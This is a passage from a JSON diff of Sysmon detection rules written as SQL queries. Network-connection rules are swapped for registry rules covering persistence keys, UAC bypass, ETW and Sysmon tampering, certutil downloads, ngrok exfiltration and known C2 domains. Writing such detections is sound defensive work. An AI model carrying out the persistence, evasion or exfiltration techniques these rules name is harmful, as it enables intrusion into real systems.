"attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" 
], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." 
+ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR 
Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. 
Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate certutil network connection" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", - "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1203" - ], 
- "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "status": "experimental", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion" ], "falsepositives": [ - "Web Browsers" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM 
logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_policies_attachments_tamper.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. 
Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.persistence" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Disable Sysmon Event Logging Via 
Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' 
ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', 
'14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", + "status": "experimental", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_hhctrl_persistence.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
+ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "ETW 
Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", + "status": "test", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112", + "attack.t1562" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + 
